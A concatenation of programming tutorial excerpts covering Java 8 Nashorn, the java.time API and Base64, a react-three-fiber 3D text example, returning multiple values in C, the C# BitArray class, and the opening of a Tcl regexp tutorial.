Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 42674, "s": 41978, "text": "import javax.script.ScriptEngineManager;\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptException;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n ScriptEngineManager scriptEngineManager = new ScriptEngineManager();\n ScriptEngine nashorn = scriptEngineManager.getEngineByName(\"nashorn\");\n\t\t\n String name = \"Mahesh\";\n Integer result = null;\n \n try {\n nashorn.eval(\"print('\" + name + \"')\");\n result = (Integer) nashorn.eval(\"10 + 2\");\n \n } catch(ScriptException e) {\n System.out.println(\"Error executing script: \"+ e.getMessage());\n }\n System.out.println(result.toString());\n }\n}" }, { "code": null, "e": 42726, "s": 42674, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 42758, "s": 42726, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 42795, "s": 42758, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 42821, "s": 42795, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 42862, "s": 42821, "text": "It should produce the following result −" }, { "code": null, "e": 42873, "s": 42862, "text": "Mahesh\n12\n" }, { "code": null, "e": 42955, "s": 42873, "text": "The following example explains how to import and use Java classes in java script." }, { "code": null, "e": 43002, "s": 42955, "text": "Create and save sample.js in c:\\> JAVA folder." }, { "code": null, "e": 43349, "s": 43002, "text": "var BigDecimal = Java.type('java.math.BigDecimal');\n\nfunction calculate(amount, percentage) {\n\n var result = new BigDecimal(amount).multiply(new BigDecimal(percentage)).divide(\n new BigDecimal(\"100\"), 2, BigDecimal.ROUND_HALF_EVEN);\n \n return result.toPlainString();\n}\nvar result = calculate(568000000000000000023,13.9);\nprint(result);" }, { "code": null, "e": 43397, "s": 43349, "text": "Open the console and use the following command." }, { "code": null, "e": 43420, "s": 43397, "text": "C:\\JAVA>jjs sample.js\n" }, { "code": null, "e": 43461, "s": 43420, "text": "It should produce the following output −" }, { "code": null, "e": 43486, "s": 43461, "text": "78952000000000000003.20\n" }, { "code": null, "e": 43588, "s": 43486, "text": "With Java 8, a new Date-Time API is introduced to cover the following drawbacks of old date-time API." }, { "code": null, "e": 43780, "s": 43588, "text": "Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods." }, { "code": null, "e": 43972, "s": 43780, "text": "Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods." }, { "code": null, "e": 44203, "s": 43972, "text": "Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations." }, { "code": null, "e": 44434, "s": 44203, "text": "Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations." 
}, { "code": null, "e": 44604, "s": 44434, "text": "Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind." }, { "code": null, "e": 44774, "s": 44604, "text": "Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind." }, { "code": null, "e": 44918, "s": 44774, "text": "Java 8 introduces a new date-time API under the package java.time. Following are some of the important classes introduced in java.time package." }, { "code": null, "e": 44992, "s": 44918, "text": "Local − Simplified date-time API with no complexity of timezone handling." }, { "code": null, "e": 45066, "s": 44992, "text": "Local − Simplified date-time API with no complexity of timezone handling." }, { "code": null, "e": 45132, "s": 45066, "text": "Zoned − Specialized date-time API to deal with various timezones." }, { "code": null, "e": 45198, "s": 45132, "text": "Zoned − Specialized date-time API to deal with various timezones." }, { "code": null, "e": 45329, "s": 45198, "text": "LocalDate/LocalTime and LocalDateTime classes simplify the development where timezones are not required. Let's see them in action." }, { "code": null, "e": 45415, "s": 45329, "text": "Create the following java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 46724, "s": 45415, "text": "import java.time.LocalDate;\nimport java.time.LocalTime;\nimport java.time.LocalDateTime;\nimport java.time.Month;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testLocalDateTime();\n }\n\t\n public void testLocalDateTime() {\n // Get the current date and time\n LocalDateTime currentTime = LocalDateTime.now();\n System.out.println(\"Current DateTime: \" + currentTime);\n\t\t\n LocalDate date1 = currentTime.toLocalDate();\n System.out.println(\"date1: \" + date1);\n\t\t\n Month month = currentTime.getMonth();\n int day = currentTime.getDayOfMonth();\n int seconds = currentTime.getSecond();\n\t\t\n System.out.println(\"Month: \" + month +\"day: \" + day +\"seconds: \" + seconds);\n\t\t\n LocalDateTime date2 = currentTime.withDayOfMonth(10).withYear(2012);\n System.out.println(\"date2: \" + date2);\n\t\t\n //12 december 2014\n LocalDate date3 = LocalDate.of(2014, Month.DECEMBER, 12);\n System.out.println(\"date3: \" + date3);\n\t\t\n //22 hour 15 minutes\n LocalTime date4 = LocalTime.of(22, 15);\n System.out.println(\"date4: \" + date4);\n\t\t\n //parse a string\n LocalTime date5 = LocalTime.parse(\"20:15:30\");\n System.out.println(\"date5: \" + date5);\n }\n}" }, { "code": null, "e": 46776, "s": 46724, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 46808, "s": 46776, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 46845, "s": 46808, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 46871, "s": 46845, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 46912, "s": 46871, "text": "It should produce the following output −" }, { "code": null, "e": 47084, "s": 46912, "text": "Current DateTime: 2014-12-09T11:00:45.457\ndate1: 2014-12-09\nMonth: DECEMBERday: 9seconds: 45\ndate2: 2012-12-10T11:00:45.457\ndate3: 2014-12-12\ndate4: 22:15\ndate5: 20:15:30\n" }, { "code": null, "e": 47181, "s": 47084, "text": "Zoned date-time API is to be used 
when time zone is to be considered. Let us see them in action." }, { "code": null, "e": 47267, "s": 47181, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 47916, "s": 47267, "text": "import java.time.ZonedDateTime;\nimport java.time.ZoneId;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testZonedDateTime();\n }\n\t\n public void testZonedDateTime() {\n // Get the current date and time\n ZonedDateTime date1 = ZonedDateTime.parse(\"2007-12-03T10:15:30+05:30[Asia/Karachi]\");\n System.out.println(\"date1: \" + date1);\n\t\t\n ZoneId id = ZoneId.of(\"Europe/Paris\");\n System.out.println(\"ZoneId: \" + id);\n\t\t\n ZoneId currentZone = ZoneId.systemDefault();\n System.out.println(\"CurrentZone: \" + currentZone);\n }\n}" }, { "code": null, "e": 47968, "s": 47916, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 48000, "s": 47968, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 48037, "s": 48000, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 48063, "s": 48037, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 48104, "s": 48063, "text": "It should produce the following output −" }, { "code": null, "e": 48194, "s": 48104, "text": "date1: 2007-12-03T10:15:30+05:00[Asia/Karachi]\nZoneId: Europe/Paris\nCurrentZone: Etc/UTC\n" }, { "code": null, "e": 48351, "s": 48194, "text": "java.time.temporal.ChronoUnit enum is added in Java 8 to replace the integer values used in old API to represent day, month, etc. Let us see them in action." }, { "code": null, "e": 48437, "s": 48351, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 49474, "s": 48437, "text": "import java.time.LocalDate;\nimport java.time.temporal.ChronoUnit;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testChromoUnits();\n }\n\t\n public void testChromoUnits() {\n //Get the current date\n LocalDate today = LocalDate.now();\n System.out.println(\"Current date: \" + today);\n\t\t\n //add 1 week to the current date\n LocalDate nextWeek = today.plus(1, ChronoUnit.WEEKS);\n System.out.println(\"Next week: \" + nextWeek);\n\t\t\n //add 1 month to the current date\n LocalDate nextMonth = today.plus(1, ChronoUnit.MONTHS);\n System.out.println(\"Next month: \" + nextMonth);\n\t\t\n //add 1 year to the current date\n LocalDate nextYear = today.plus(1, ChronoUnit.YEARS);\n System.out.println(\"Next year: \" + nextYear);\n\t\t\n //add 10 years to the current date\n LocalDate nextDecade = today.plus(1, ChronoUnit.DECADES);\n System.out.println(\"Date after ten year: \" + nextDecade);\n }\n}" }, { "code": null, "e": 49526, "s": 49474, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 49558, "s": 49526, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 49595, "s": 49558, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 49621, "s": 49595, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 49662, "s": 49621, "text": "It should produce the following result −" }, { "code": null, "e": 49787, "s": 49662, "text": "Current date: 2014-12-10\nNext week: 2014-12-17\nNext month: 2015-01-10\nNext year: 2015-12-10\nDate after ten year: 2024-12-10\n" }, { "code": null, "e": 49874, "s": 49787, "text": "With Java 8, two specialized classes are introduced to deal with the time differences." }, { "code": null, "e": 49924, "s": 49874, "text": "Period − It deals with date based amount of time." }, { "code": null, "e": 49974, "s": 49924, "text": "Period − It deals with date based amount of time." }, { "code": null, "e": 50026, "s": 49974, "text": "Duration − It deals with time based amount of time." }, { "code": null, "e": 50078, "s": 50026, "text": "Duration − It deals with time based amount of time." }, { "code": null, "e": 50105, "s": 50078, "text": "Let us see them in action." }, { "code": null, "e": 50191, "s": 50105, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 51239, "s": 50191, "text": "import java.time.temporal.ChronoUnit;\n\nimport java.time.LocalDate;\nimport java.time.LocalTime;\nimport java.time.Duration;\nimport java.time.Period;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testPeriod();\n java8tester.testDuration();\n }\n\t\n public void testPeriod() {\n //Get the current date\n LocalDate date1 = LocalDate.now();\n System.out.println(\"Current date: \" + date1);\n\t\t\n //add 1 month to the current date\n LocalDate date2 = date1.plus(1, ChronoUnit.MONTHS);\n System.out.println(\"Next month: \" + date2);\n \n Period period = Period.between(date2, date1);\n System.out.println(\"Period: \" + period);\n }\n\t\n public void testDuration() {\n LocalTime time1 = LocalTime.now();\n Duration twoHours = Duration.ofHours(2);\n\t\t\n LocalTime time2 = time1.plus(twoHours);\n Duration duration = Duration.between(time1, time2);\n\t\t\n System.out.println(\"Duration: \" + duration);\n }\n}" }, { "code": null, "e": 51291, "s": 51239, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 51323, "s": 51291, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 51360, "s": 51323, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 51386, "s": 51360, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 51427, "s": 51386, "text": "It should produce the following output −" }, { "code": null, "e": 51504, "s": 51427, "text": "Current date: 2014-12-10\nNext month: 2015-01-10\nPeriod: P-1M\nDuration: PT2H\n" }, { "code": null, "e": 51660, "s": 51504, "text": "TemporalAdjuster is used to perform the date mathematics. For example, get the \"Second Saturday of the Month\" or \"Next Tuesday\". Let us see them in action." }, { "code": null, "e": 51746, "s": 51660, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 52712, "s": 51746, "text": "import java.time.LocalDate;\nimport java.time.temporal.TemporalAdjusters;\nimport java.time.DayOfWeek;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testAdjusters();\n }\n\t\n public void testAdjusters() {\n //Get the current date\n LocalDate date1 = LocalDate.now();\n System.out.println(\"Current date: \" + date1);\n\t\t\n //get the next tuesday\n LocalDate nextTuesday = date1.with(TemporalAdjusters.next(DayOfWeek.TUESDAY));\n System.out.println(\"Next Tuesday on : \" + nextTuesday);\n\t\t\n //get the second saturday of next month\n LocalDate firstInYear = LocalDate.of(date1.getYear(),date1.getMonth(), 1);\n LocalDate secondSaturday = firstInYear.with(TemporalAdjusters.nextOrSame(\n DayOfWeek.SATURDAY)).with(TemporalAdjusters.next(DayOfWeek.SATURDAY));\n System.out.println(\"Second Saturday on : \" + secondSaturday);\n }\n}" }, { "code": null, "e": 52764, "s": 52712, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 52796, "s": 52764, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 52833, "s": 52796, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 52859, "s": 52833, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 52900, "s": 52859, "text": "It should produce the following result −" }, { "code": null, "e": 52987, "s": 52900, "text": "Current date: 2014-12-10\nNext Tuesday on : 2014-12-16\nSecond Saturday on : 2014-12-13\n" }, { "code": null, "e": 53234, "s": 52987, "text": "A toInstant() method is added to the original Date and Calendar objects, which can be used to convert them to the new Date-Time API. Use an ofInstant(Insant,ZoneId) method to get a LocalDateTime or ZonedDateTime object. Let us see them in action." }, { "code": null, "e": 53320, "s": 53234, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 54258, "s": 53320, "text": "import java.time.LocalDateTime;\nimport java.time.ZonedDateTime;\n\nimport java.util.Date;\n\nimport java.time.Instant;\nimport java.time.ZoneId;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8tester = new Java8Tester();\n java8tester.testBackwardCompatability();\n }\n\t\n public void testBackwardCompatability() {\n //Get the current date\n Date currentDate = new Date();\n System.out.println(\"Current date: \" + currentDate);\n\t\t\n //Get the instant of current date in terms of milliseconds\n Instant now = currentDate.toInstant();\n ZoneId currentZone = ZoneId.systemDefault();\n\t\t\n LocalDateTime localDateTime = LocalDateTime.ofInstant(now, currentZone);\n System.out.println(\"Local date: \" + localDateTime);\n\t\t\n ZonedDateTime zonedDateTime = ZonedDateTime.ofInstant(now, currentZone);\n System.out.println(\"Zoned date: \" + zonedDateTime);\n }\n}" }, { "code": null, "e": 54310, "s": 54258, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 54342, "s": 54310, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 54379, "s": 54342, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 54405, "s": 54379, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 54446, "s": 54405, "text": "It should produce the following output −" }, { "code": null, "e": 54572, "s": 54446, "text": "Current date: Wed Dec 10 05:44:06 UTC 2014\nLocal date: 2014-12-10T05:44:06.635\nZoned date: 2014-12-10T05:44:06.635Z[Etc/UTC]\n" }, { "code": null, "e": 54735, "s": 54572, "text": "With Java 8, Base64 has finally got its due. Java 8 now has inbuilt encoder and decoder for Base64 encoding. In Java 8, we can use three types of Base64 encoding." }, { "code": null, "e": 54918, "s": 54735, "text": "Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/." }, { "code": null, "e": 55101, "s": 54918, "text": "Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/." }, { "code": null, "e": 55200, "s": 55101, "text": "URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe." }, { "code": null, "e": 55299, "s": 55200, "text": "URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe." }, { "code": null, "e": 55561, "s": 55299, "text": "MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\\r' followed by a linefeed '\\n' as the line separator. No line separator is present to the end of the encoded output." }, { "code": null, "e": 55823, "s": 55561, "text": "MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\\r' followed by a linefeed '\\n' as the line separator. No line separator is present to the end of the encoded output." }, { "code": null, "e": 55851, "s": 55823, "text": "static class Base64.Decoder" }, { "code": null, "e": 55978, "s": 55851, "text": "This class implements a decoder for decoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045." 
}, { "code": null, "e": 56006, "s": 55978, "text": "static class Base64.Encoder" }, { "code": null, "e": 56134, "s": 56006, "text": "This class implements an encoder for encoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045." }, { "code": null, "e": 56169, "s": 56134, "text": "static Base64.Decoder getDecoder()" }, { "code": null, "e": 56252, "s": 56169, "text": "Returns a Base64.Decoder that decodes using the Basic type base64 encoding scheme." }, { "code": null, "e": 56287, "s": 56252, "text": "static Base64.Encoder getEncoder()" }, { "code": null, "e": 56370, "s": 56287, "text": "Returns a Base64.Encoder that encodes using the Basic type base64 encoding scheme." }, { "code": null, "e": 56409, "s": 56370, "text": "static Base64.Decoder getMimeDecoder()" }, { "code": null, "e": 56491, "s": 56409, "text": "Returns a Base64.Decoder that decodes using the MIME type base64 decoding scheme." }, { "code": null, "e": 56530, "s": 56491, "text": "static Base64.Encoder getMimeEncoder()" }, { "code": null, "e": 56612, "s": 56530, "text": "Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme." }, { "code": null, "e": 56687, "s": 56612, "text": "static Base64.Encoder getMimeEncoder(int lineLength, byte[] lineSeparator)" }, { "code": null, "e": 56816, "s": 56687, "text": "Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme with specified line length and line separators." }, { "code": null, "e": 56854, "s": 56816, "text": "static Base64.Decoder getUrlDecoder()" }, { "code": null, "e": 56953, "s": 56854, "text": "Returns a Base64.Decoder that decodes using the URL and Filename safe type base64 encoding scheme." }, { "code": null, "e": 56991, "s": 56953, "text": "static Base64.Encoder getUrlEncoder()" }, { "code": null, "e": 57090, "s": 56991, "text": "Returns a Base64.Encoder that encodes using the URL and Filename safe type base64 encoding scheme." }, { "code": null, "e": 57145, "s": 57090, "text": "This class inherits methods from the following class −" }, { "code": null, "e": 57162, "s": 57145, "text": "java.lang.Object" }, { "code": null, "e": 57246, "s": 57162, "text": "Create the following Java program using any editor of your choice in say C:/> JAVA." 
}, { "code": null, "e": 58640, "s": 57246, "text": "import java.util.Base64;\nimport java.util.UUID;\nimport java.io.UnsupportedEncodingException;\n\npublic class HelloWorld {\n\n public static void main(String args[]) {\n\n try {\n\t\t\n // Encode using basic encoder\n String base64encodedString = Base64.getEncoder().encodeToString(\n \"TutorialsPoint?java8\".getBytes(\"utf-8\"));\n System.out.println(\"Base64 Encoded String (Basic) :\" + base64encodedString);\n\t\t\n // Decode\n byte[] base64decodedBytes = Base64.getDecoder().decode(base64encodedString);\n\t\t\n System.out.println(\"Original String: \" + new String(base64decodedBytes, \"utf-8\"));\n base64encodedString = Base64.getUrlEncoder().encodeToString(\n \"TutorialsPoint?java8\".getBytes(\"utf-8\"));\n System.out.println(\"Base64 Encoded String (URL) :\" + base64encodedString);\n\t\t\n StringBuilder stringBuilder = new StringBuilder();\n\t\t\n for (int i = 0; i < 10; ++i) {\n stringBuilder.append(UUID.randomUUID().toString());\n }\n\t\t\n byte[] mimeBytes = stringBuilder.toString().getBytes(\"utf-8\");\n String mimeEncodedString = Base64.getMimeEncoder().encodeToString(mimeBytes);\n System.out.println(\"Base64 Encoded String (MIME) :\" + mimeEncodedString);\n\n } catch(UnsupportedEncodingException e) {\n System.out.println(\"Error :\" + e.getMessage());\n }\n }\n}" }, { "code": null, "e": 58692, "s": 58640, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 58724, "s": 58692, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 58761, "s": 58724, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 58787, "s": 58761, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 58828, "s": 58787, "text": "It should produce the following output −" }, { "code": null, "e": 59502, "s": 58828, "text": "Base64 Encoded String (Basic) :VHV0b3JpYWxzUG9pbnQ/amF2YTg=\nOriginal String: TutorialsPoint?java8\nBase64 Encoded String (URL) :VHV0b3JpYWxzUG9pbnQ_amF2YTg=\nBase64 Encoded String (MIME) :YmU3NWY2ODktNGM5YS00ODlmLWI2MTUtZTVkOTk2YzQ1Njk1Y2EwZTg2OTEtMmRiZC00YTQ1LWJl\nNTctMTI1MWUwMTk0ZWQyNDE0NDAwYjgtYTYxOS00NDY5LTllYTctNjc1YzE3YWJhZTk1MTQ2MDQz\nNDItOTAyOC00ZWI0LThlOTYtZWU5YzcwNWQyYzVhMTQxMWRjYTMtY2MwNi00MzU0LTg0MTgtNGQ1\nMDkwYjdiMzg2ZTY0OWU5MmUtZmNkYS00YWEwLTg0MjQtYThiOTQxNDQ2YzhhNTVhYWExZjItNjU2\nMi00YmM4LTk2ZGYtMDE4YmY5ZDZhMjkwMzM3MWUzNDMtMmQ3MS00MDczLWI0Y2UtMTQxODE0MGU5\nYjdmYTVlODUxYzItN2NmOS00N2UyLWIyODQtMThlMWVkYTY4M2Q1YjE3YTMyYmItZjllMS00MTFk\nLWJiM2UtM2JhYzUxYzI5OWI4\n" }, { "code": null, "e": 59535, "s": 59502, "text": "\n 16 Lectures \n 2 hours \n" }, { "code": null, "e": 59551, "s": 59535, "text": " Malhar Lathkar" }, { "code": null, "e": 59584, "s": 59551, "text": "\n 19 Lectures \n 5 hours \n" }, { "code": null, "e": 59600, "s": 59584, "text": " Malhar Lathkar" }, { "code": null, "e": 59635, "s": 59600, "text": "\n 25 Lectures \n 2.5 hours \n" }, { "code": null, "e": 59649, "s": 59635, "text": " Anadi Sharma" }, { "code": null, "e": 59683, "s": 59649, "text": "\n 126 Lectures \n 7 hours \n" }, { "code": null, "e": 59697, "s": 59683, "text": " Tushar Kale" }, { "code": null, "e": 59734, "s": 59697, "text": "\n 119 Lectures \n 17.5 hours \n" }, { "code": null, "e": 59749, "s": 59734, "text": " Monica Mittal" }, { "code": null, "e": 59782, "s": 59749, "text": "\n 76 Lectures \n 7 hours \n" }, { "code": null, "e": 59801, "s": 59782, "text": " Arnab Chakraborty" }, { "code": null, "e": 59808, "s": 59801, "text": " Print" }, { "code": null, "e": 59819, "s": 59808, 
"text": " Add Notes" } ]
Creating 3D Text using React-three-fiber
In this article, we will see how to create 3D text using react-three-fiber. We will first download a typeface font as JSON and then add it to our text geometry object. We will also add orbit controls, which let us rotate the camera around the text and view the 3D text properly. So, let's get started.

First, download the required libraries −

npm i --save @react-three/fiber three

The react-three/fiber library adds a WebGL renderer to the website and connects three.js with React.

Now download a typeface font as JSON and put it inside the “src” folder. You can download a font from Google Fonts and use https://gero3.github.io/facetype.js/ to convert it into JSON.

Add the following lines of code in App.js −

import React, { useEffect } from "react";
import { Canvas, useThree } from "@react-three/fiber";
import { OrbitControls } from "three/examples/jsm/controls/OrbitControls";
import * as THREE from "three";
import Roboto from "./Roboto_Regular.json"
import "./App.css";

const CameraController = () => {
   const { camera, gl } = useThree();
   useEffect(
      () => {
         const controls = new OrbitControls(camera, gl.domElement);
         controls.minDistance = 3;
         controls.maxDistance = 20;
         return () => {
            controls.dispose();
         };
      },
      [camera, gl]
   );
   return null;
};
function Text3d(){
   const font = new THREE.FontLoader().parse(Roboto);
   const textOptions = {
      font,
      size: 5,
      height: 1
   };
   return (
      <mesh>
         <textGeometry attach='geometry' args={['three.js', textOptions]} />
         <meshStandardMaterial attach='material' color="hotpink" />
      </mesh>
   )
}
export default function App(){
   return (
      <Canvas>
         <CameraController/>
         <ambientLight />
         <Text3d/>
      </Canvas>
   );
};

We first loaded the JSON font through the “Roboto” import and then, inside the Text3d component, parsed it as a font and stored it in the “font” const. We then set its size and other aspects in “textOptions”. Next, we created a textGeometry, passed it the args, and used a material object to apply the styles.

When you run the app, the 3D text is rendered on the canvas and, thanks to the orbit controls, you can rotate the view to inspect it from any angle.
How can we return multiple values from a function in C/C++?
In C or C++, we cannot return multiple values from a function directly. In this section, we will see a technique for returning more than one value from a function.

We can return more than one value from a function by using the method called “call by address” (also known as “call by reference”). In the calling function, we use two variables to store the results; the called function takes pointer parameters, so we pass the addresses of those variables.

In this example, we will see how to define a single function that returns both the quotient and the remainder after dividing two numbers. A C++ sketch of the same idea using references follows the example.

#include<stdio.h>
void div(int a, int b, int *quotient, int *remainder) {
   *quotient = a / b;
   *remainder = a % b;
}
int main() {
   int a = 76, b = 10;
   int q, r;
   div(a, b, &q, &r);
   printf("Quotient is: %d\nRemainder is: %d\n", q, r);
   return 0;
}

Quotient is: 7
Remainder is: 6
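Since the article covers C++ as well, here is a hedged sketch of the same idea using C++ references and, alternatively, std::pair. The function and variable names here are illustrative and not part of the original example.

#include <iostream>
#include <utility>   // std::pair

// Same idea with C++ references: the caller's variables are modified directly.
void divide(int a, int b, int &quotient, int &remainder) {
   quotient = a / b;
   remainder = a % b;
}

// Alternative: bundle both results into a std::pair and return it by value.
std::pair<int, int> dividePair(int a, int b) {
   return { a / b, a % b };
}

int main() {
   int q, r;
   divide(76, 10, q, r);
   std::cout << "Quotient is: " << q << "\nRemainder is: " << r << std::endl;

   std::pair<int, int> result = dividePair(76, 10);
   std::cout << "Quotient is: " << result.first << "\nRemainder is: " << result.second << std::endl;
   return 0;
}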
C# - BitArray Class
The BitArray class manages a compact array of bit values, which are represented as Booleans, where true indicates that the bit is on (1) and false indicates the bit is off (0). It is used when you need to store the bits but do not know the number of bits in advance. You can access items from the BitArray collection by using an integer index, which starts from zero. The following table lists some of the commonly used properties of the BitArray class − Count Gets the number of elements contained in the BitArray. IsReadOnly Gets a value indicating whether the BitArray is read-only. Item Gets or sets the value of the bit at a specific position in the BitArray. Length Gets or sets the number of elements in the BitArray. The following table lists some of the commonly used methods of the BitArray class − public BitArray And(BitArray value); Performs the bitwise AND operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. public bool Get(int index); Gets the value of the bit at a specific position in the BitArray. public BitArray Not(); Inverts all the bit values in the current BitArray, so that elements set to true are changed to false, and elements set to false are changed to true. public BitArray Or(BitArray value); Performs the bitwise OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. public void Set(int index, bool value); Sets the bit at a specific position in the BitArray to the specified value. public void SetAll(bool value); Sets all bits in the BitArray to the specified value. public BitArray Xor(BitArray value); Performs the bitwise eXclusive OR operation on the elements in the current BitArray against the corresponding elements in the specified BitArray. 
The following example demonstrates the use of the BitArray class −

using System;
using System.Collections;

namespace CollectionsApplication {
   class Program {
      static void Main(string[] args) {
         //creating two bit arrays of size 8
         BitArray ba1 = new BitArray(8);
         BitArray ba2 = new BitArray(8);
         
         byte[] a = { 60 };
         byte[] b = { 13 };
         
         //storing the values 60, and 13 into the bit arrays
         ba1 = new BitArray(a);
         ba2 = new BitArray(b);
         
         //content of ba1
         Console.WriteLine("Bit array ba1: 60");
         
         for (int i = 0; i < ba1.Count; i++) {
            Console.Write("{0, -6} ", ba1[i]);
         }
         Console.WriteLine();
         
         //content of ba2
         Console.WriteLine("Bit array ba2: 13");
         
         for (int i = 0; i < ba2.Count; i++) {
            Console.Write("{0, -6} ", ba2[i]);
         }
         Console.WriteLine();
         BitArray ba3 = new BitArray(8);
         ba3 = ba1.And(ba2);
         
         //content of ba3
         Console.WriteLine("Bit array ba3 after AND operation: 12");
         
         for (int i = 0; i < ba3.Count; i++) {
            Console.Write("{0, -6} ", ba3[i]);
         }
         Console.WriteLine();
         ba3 = ba1.Or(ba2);
         
         //content of ba3
         Console.WriteLine("Bit array ba3 after OR operation: 61");
         
         for (int i = 0; i < ba3.Count; i++) {
            Console.Write("{0, -6} ", ba3[i]);
         }
         Console.WriteLine();

         Console.ReadKey();
      }
   }
}

When the above code is compiled and executed, it produces the following result −

Bit array ba1: 60 
False False True True True True False False 
Bit array ba2: 13
True False True True False False False False 
Bit array ba3 after AND operation: 12
False False True True False False False False 
Bit array ba3 after OR operation: 61
True False True True True True False False 
Tcl - Regular Expressions
The "regexp" command is used to match a regular expression in Tcl. A regular expression is a sequence of characters that describes a search pattern. It is built from multiple rules, and the following table explains these rules and their corresponding use.

x
Exact match.

[a-z]
Any lowercase letter from a-z.

.
Any character.

^
Beginning of the string should match.

$
End of the string should match.

\^
Backslash sequence to match the special character ^. Similar sequences can be used for the other special characters.

()
Add the above sequences inside parentheses to make a regular expression.

x*
Should match 0 or more occurrences of the preceding x.

x+
Should match 1 or more occurrences of the preceding x.

x?
Should match 0 or 1 occurrence of the preceding x.

{digit}
Matches exactly digit occurrences of the previous regex expression, where digit is a number from 0-9.

{digit,}
Matches digit or more occurrences of the previous regex expression, where digit is a number from 0-9.

{digit1,digit2}
Matches between digit1 and digit2 occurrences of the previous regex expression.

The syntax for regexp is given below −

regexp optionalSwitches patterns searchString fullMatch subMatch1 ... subMatchn

Here, regexp is the command. We will see about the optional switches later. Patterns are the rules as mentioned earlier. searchString is the actual string on which the regexp is performed. fullMatch is a variable that holds the result of the full match. subMatch1 to subMatchn are optional variables that hold the results of the sub-match patterns.

Let's look at some simple examples before diving into complex ones. Here is a simple example for a string made up of alphabets only; when any other character is encountered, the regexp search stops and returns.

#!/usr/bin/tclsh

regexp {([A-Za-z]*)} "Tcl Tutorial" a b 
puts "Full Match: $a"
puts "Sub Match1: $b"

When the above code is executed, it produces the following result −

Full Match: Tcl
Sub Match1: Tcl

The following example shows how to search for multiple patterns. This example pattern matches any alphabets followed by any character followed by any alphabets.

#!/usr/bin/tclsh

